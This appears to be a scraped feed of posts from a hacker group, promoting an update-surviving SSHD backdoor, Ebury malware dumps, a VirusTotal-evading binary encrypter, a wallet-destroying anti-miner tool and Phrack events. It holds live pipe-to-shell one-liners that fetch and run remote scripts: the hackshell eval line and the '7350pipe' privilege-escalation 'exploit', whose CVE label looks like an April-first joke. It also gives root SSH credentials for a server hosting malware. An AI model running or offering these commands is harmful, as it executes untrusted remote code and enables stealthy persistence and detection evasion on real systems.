@lp0_on_fire it will work fine without systemctl. Any way to restart the sshd will work. either by waiting for a reboot or send a SIGTERM.

@agowa338 Can't see how rhost is better. rhosts-trick requires the attacker to drop at least 2 new files to the target and change at least 1 line in the sshd_config (HostbasedAuthentication; a line that raises a red flag).

Our trick adds no new file to the system and only needs 1 line to the config (without raising a red flag).

Please explain if I got this wrong.

Can anyone test my *SMALLEST* SSHD backdoor?

- Survives updates.
- Does not use ~/.ssh/authorized_keys or PAM modules.
- Does not create any new file.

Just SSHD trickery.

Source at https://thc.org/tips

Stealth died 😢 A member of Team-Teso, Phrack staff, and many other groups. A true hacker—perhaps as true as a hacker can ever be. WE MISS YOU. 🩷

More: https://thc.org/404

<stealth> we had joy we had fun we had a rootshell on a sun.

Ebury Version 1.8.2.e6

Memory dump from live processes now available (sshd and systemd-udev). De-crypted and De-obfuscated. Enjoy.

{eval,"$({curl,-SsfL,https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh})"}

### hackshell now detects Ebury ###

EBury SSHD backdoor?? on 400,000 hosts?

Let's fuck around and find out. (Why +s on the .so file???)

Dissect, understand & ridicule. Join the group effort at https://thc.org/ops or SSH straight into the server and check ~/ebury:

ssh -o "SetEnv SECRET=lYQkdQHIuQyTJngVtIskqRLx" root@adm.segfault.net (password is 'segfault')

INTERVIEW of "MB" WhereWarlocksStayUpLate:

https://wherewarlocksstayuplate.com/interview/mohammed-bagha/

You have inspired many. We are fans:⚡️🌊🎠

https://wherewarlocksstayuplate.com/interview/mohammed-bagha/

🇩🇪 German speaking only: THC member and @phrack staff on @heiseonline about Phrack's 40th, hacking and life in general.

Inject LUA scripts into a running Linux Process like a boss, by stealth/team-teso:

https://c-skills.blogspot.com

Friend of ours is testing his PoC to DISABLE XMR mining pools.

Revenge for all those pesty XMR miners installed by script kiddies. Tool destroys the ENTIRE wallet: stopping all xmr-rig miners worldwide (of the same wallet).

Looking for more WALLETs: https://wallet.hellknight.xyz/walletinfo1.php

Please help and save a baby seal.

PHONY AWARD ceremony at the PHRACK PARTY at @why2025camp hosted by @Emerson @thc and tmp.out

VOTE (by shouting) for the “Biggest Security Facepalm” and more. Legends like Hegseth and Crowdstrike have been nominated and informed.

Winning prize is the privilege to be trolled by us and pay for phrack's next print release :>

PHRACK is coming to #DEFCON! We're printing ~10,000 zines and giving an hour-long talk you won't want to miss! Stay tuned. 🔥 #40yrsOfPhrack #phrack72

Dear UNC5174/China, you have violated THC's Terms & Conditions ("to be used for good purpose and academic research only").

May want to discuss this with your therapist. 🤷‍♂️

https://www.sentinelone.com/labs/follow-the-smoke-china-nexus-threat-actors-hammer-at-the-doors-of-top-tier-targets/

Generate your own python-implant of a reverse DNS backdoor. https://thc.org/tips => 6.vi Smallest reverse DNS-tunnel Backdoor.

🐣 CRACKME RESULTS are OUT! 💥

Congrats to rt_saber for being so quick.

Kudos to all those who hammered CloudFlare hard.

https://github.com/phrackzine/crackme/blob/main/easter-2025/teaser-challenge-solution.md

new FEATURE in bincrypter. LOCK & ENCRYPT a binary to a target host. Will execute differently when uploaded to http://virustotal.com or any other but the target host.

Please don't set BC_LOCK="rm -rf ~/" 🙈

https://github.com/hackerschoice/bincrypter

i heard John Young of https://cryptome.org/ passed away last week. #Cryptome #RIP

John was an uncompromising rolemodel, publishing all the samizdats he could get his hands on. he even demanded to be included as a defendant together with julian assange.

one of the greatest unsung heroes of the past 30 years.

shit. i hope this is not true.

RIP John.

🍿THC member on camera. A first. 😅
30 years of hacking - a perspective and a reflection. 📺 👉 Keep Hacking 👈 The next 30 years of hacking start today. ❤️

https://www.youtube.com/watch?v=sQVLniT9CDY

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL https://thc.org/7350pipe)”